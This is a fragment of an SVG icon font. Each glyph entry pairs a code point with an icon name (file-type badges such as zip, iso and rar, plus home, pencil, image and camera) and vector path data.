<glyph unicode="&#xed3d;" glyph-name="document-file-wav2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM528 224h-16l-48 96-48-96h-32v224h32v-160l32 64h32l32-64v160h32v-224h-16zM704 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM639.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM848 280l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xed3e;" glyph-name="document-file-zip" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 256l128 160v32h-160v-32h128l-128-160v-32h160v32h-128zM640 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM736 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM768 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xed3f;" glyph-name="document-file-zip2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 256l128 160v32h-160v-32h128l-128-160v-32h160v32h-128zM640 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM736 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM768 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xed40;" glyph-name="document-file-ott" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM640 416v-192h32v192h64v32h-160v-32h64zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed41;" glyph-name="document-file-ott2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM640 416v-192h32v192h64v32h-160v-32h64zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed42;" glyph-name="document-file-tgz" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-192h32v192h64v32h-160v-32h64zM704 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM800 256l128 160v32h-160v-32h128l-128-160v-32h160v32h-128z" />
<glyph unicode="&#xed43;" glyph-name="document-file-tgz2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-192h32v192h64v32h-160v-32h64zM704 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM800 256l128 160v32h-160v-32h128l-128-160v-32h160v32h-128z" />
<glyph unicode="&#xed44;" glyph-name="document-file-dmg" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM656 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xed45;" glyph-name="document-file-dmg2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM656 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xed46;" glyph-name="document-file-iso" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM800.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM799.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067z" />
<glyph unicode="&#xed47;" glyph-name="document-file-iso2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM800.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM799.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067z" />
<glyph unicode="&#xed48;" glyph-name="document-file-rar" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM441.6 320h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM639.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM825.6 320h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xed49;" glyph-name="document-file-rar2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM441.6 320h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM639.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM825.6 320h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xed4a;" glyph-name="document-file-gif" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM544 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM640 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM768 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xed4b;" glyph-name="document-file-gif2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM544 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM640 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM768 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xed4c;" glyph-name="home" d="M1024 369.556l-512 397.426-512-397.428v162.038l512 397.426 512-397.428zM896 384v-384h-256v256h-256v-256h-256v384l384 288z" />
<glyph unicode="&#xed4d;" glyph-name="home2" d="M512 928l-512-512 96-96 96 96v-416h256v192h128v-192h256v416l96-96 96 96-512 512zM512 512c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64z" />
<glyph unicode="&#xed4e;" glyph-name="home3" d="M1024 352l-192 192v288h-128v-160l-192 192-512-512v-32h128v-320h320v192h128v-192h320v320h128z" />
<glyph unicode="&#xed4f;" glyph-name="office" d="M0-64h512v1024h-512v-1024zM320 832h128v-128h-128v128zM320 576h128v-128h-128v128zM320 320h128v-128h-128v128zM64 832h128v-128h-128v128zM64 576h128v-128h-128v128zM64 320h128v-128h-128v128zM576 640h448v-64h-448zM576-64h128v256h192v-256h128v576h-448z" />
<glyph unicode="&#xed50;" glyph-name="newspaper" d="M896 704v128h-896v-704c0-35.346 28.654-64 64-64h864c53.022 0 96 42.978 96 96v544h-128zM832 128h-768v640h768v-640zM128 640h640v-64h-640zM512 512h256v-64h-256zM512 384h256v-64h-256zM512 256h192v-64h-192zM128 512h320v-320h-320z" />
<glyph unicode="&#xed51;" glyph-name="pencil" d="M864 960c88.364 0 160-71.634 160-160 0-36.020-11.91-69.258-32-96l-64-64-224 224 64 64c26.742 20.090 59.978 32 96 32zM64 224l-64-288 288 64 592 592-224 224-592-592zM715.578 596.422l-448-448-55.156 55.156 448 448 55.156-55.156z" />
<glyph unicode="&#xed52;" glyph-name="pencil2" d="M384 320l128 64 448 448-64 64-448-448-64-128zM289.3 92.902c-31.632 66.728-65.666 100.762-132.396 132.394l99.096 272.792 128 77.912 384 384h-192l-384-384-192-640 640 192 384 384v192l-384-384-77.912-128z" />
<glyph unicode="&#xed53;" glyph-name="quill" d="M0-64c128 384 463 1024 1024 1024-263-211-384-704-576-704s-192 0-192 0l-192-320h-64z" />
<glyph unicode="&#xed54;" glyph-name="pen" d="M1018.17 668.11l-286.058 286.058c-9.334 9.334-21.644 7.234-27.356-4.666l-38.354-79.904 267.198-267.198 79.904 38.354c11.9 5.712 14 18.022 4.666 27.356zM615.384 824.616l-263.384-21.95c-17.5-2.166-32.080-5.898-37.090-28.752-0.006-0.024-0.012-0.042-0.018-0.066-71.422-343.070-314.892-677.848-314.892-677.848l57.374-57.374 271.986 271.99c-5.996 12.53-9.36 26.564-9.36 41.384 0 53.020 42.98 96 96 96s96-42.98 96-96-42.98-96-96-96c-14.82 0-28.852 3.364-41.384 9.36l-271.988-271.986 57.372-57.374c0 0 334.778 243.47 677.848 314.892 0.024 0.006 0.042 0.012 0.066 0.018 22.854 5.010 26.586 19.59 28.752 37.090l21.95 263.384-273.232 273.232z" />
<glyph unicode="&#xed55;" glyph-name="blog" d="M384 960v-96c73.482 0 144.712-14.37 211.716-42.71 64.768-27.394 122.958-66.632 172.948-116.624s89.228-108.18 116.624-172.948c28.342-67.004 42.712-138.238 42.712-211.718h96c0 353.46-286.54 640-640 640zM384 768v-96c94.022 0 182.418-36.614 248.9-103.098 66.486-66.484 103.1-154.878 103.1-248.902h96c0 247.422-200.576 448-448 448zM480 576l-64-64-224-64-192-416 25.374-25.374 232.804 232.804c-1.412 5.286-2.178 10.84-2.178 16.57 0 35.346 28.654 64 64 64s64-28.654 64-64-28.654-64-64-64c-5.732 0-11.282 0.764-16.568 2.178l-232.804-232.804 25.372-25.374 416 192 64 224 64 64-160 160z" />
<glyph unicode="&#xed56;" glyph-name="eyedropper" d="M986.51 922.51c-49.988 49.986-131.032 49.986-181.020 0l-172.118-172.118-121.372 121.372-135.764-135.764 106.426-106.426-472.118-472.118c-8.048-8.048-11.468-18.958-10.3-29.456h-0.244v-160c0-17.674 14.328-32 32-32h160c0 0 2.664 0 4 0 9.212 0 18.426 3.516 25.456 10.544l472.118 472.118 106.426-106.426 135.764 135.764-121.372 121.372 172.118 172.118c49.986 49.988 49.986 131.032 0 181.020zM173.090 0h-109.090v109.090l469.574 469.572 109.088-109.088-469.572-469.574z" />
<glyph unicode="&#xed57;" glyph-name="droplet" d="M864.626 486.838c-65.754 183.44-205.11 348.15-352.626 473.162-147.516-125.012-286.87-289.722-352.626-473.162-40.664-113.436-44.682-236.562 12.584-345.4 65.846-125.14 198.632-205.438 340.042-205.438s274.196 80.298 340.040 205.44c57.27 108.838 53.25 231.962 12.586 345.398zM738.764 201.044c-43.802-83.252-132.812-137.044-226.764-137.044-55.12 0-108.524 18.536-152.112 50.652 13.242-1.724 26.632-2.652 40.112-2.652 117.426 0 228.668 67.214 283.402 171.242 44.878 85.292 40.978 173.848 23.882 244.338 14.558-28.15 26.906-56.198 36.848-83.932 22.606-63.062 40.024-156.34-5.368-242.604z" />
<glyph unicode="&#xed58;" glyph-name="paint-format" d="M1024 384v384h-192v64c0 35.2-28.8 64-64 64h-704c-35.2 0-64-28.8-64-64v-192c0-35.2 28.8-64 64-64h704c35.2 0 64 28.8 64 64v64h128v-256h-576v-128h-32c-17.674 0-32-14.326-32-32v-320c0-17.674 14.326-32 32-32h128c17.674 0 32 14.326 32 32v320c0 17.674-14.326 32-32 32h-32v64h576zM768 768h-704v64h704v-64z" />
<glyph unicode="&#xed59;" glyph-name="image" d="M959.884 832c0.040-0.034 0.082-0.076 0.116-0.116v-767.77c-0.034-0.040-0.076-0.082-0.116-0.116h-895.77c-0.040 0.034-0.082 0.076-0.114 0.116v767.772c0.034 0.040 0.076 0.082 0.114 0.114h895.77zM960 896h-896c-35.2 0-64-28.8-64-64v-768c0-35.2 28.8-64 64-64h896c35.2 0 64 28.8 64 64v768c0 35.2-28.8 64-64 64v0zM832 672c0-53.020-42.98-96-96-96s-96 42.98-96 96 42.98 96 96 96 96-42.98 96-96zM896 128h-768v128l224 384 256-320h64l224 192z" />
<glyph unicode="&#xed5a;" glyph-name="images" horiz-adv-x="1152" d="M1088 832h-64v64c0 35.2-28.8 64-64 64h-896c-35.2 0-64-28.8-64-64v-768c0-35.2 28.8-64 64-64h64v-64c0-35.2 28.8-64 64-64h896c35.2 0 64 28.8 64 64v768c0 35.2-28.8 64-64 64zM128 768v-640h-63.886c-0.040 0.034-0.082 0.076-0.114 0.116v767.77c0.034 0.040 0.076 0.082 0.114 0.114h895.77c0.040-0.034 0.082-0.076 0.116-0.116v-63.884h-768c-35.2 0-64-28.8-64-64v0zM1088 0.116c-0.034-0.040-0.076-0.082-0.116-0.116h-895.77c-0.040 0.034-0.082 0.076-0.114 0.116v767.77c0.034 0.040 0.076 0.082 0.114 0.114h895.77c0.040-0.034 0.082-0.076 0.116-0.116v-767.768zM960 608c0-53.020-42.98-96-96-96s-96 42.98-96 96 42.98 96 96 96 96-42.98 96-96zM1024 64h-768v128l224 384 256-320h64l224 192z" />
<glyph unicode="&#xed5b;" glyph-name="camera" d="M304 352c0-114.876 93.124-208 208-208s208 93.124 208 208-93.124 208-208 208-208-93.124-208-208zM960 704h-224c-16 64-32 128-96 128h-256c-64 0-80-64-96-128h-224c-35.2 0-64-28.8-64-64v-576c0-35.2 28.8-64 64-64h896c35.2 0 64 28.8 64 64v576c0 35.2-28.8 64-64 64zM512 68c-156.85 0-284 127.148-284 284 0 156.85 127.15 284 284 284 156.852 0 284-127.15 284-284 0-156.852-127.146-284-284-284zM960 512h-128v64h128v-64z" />
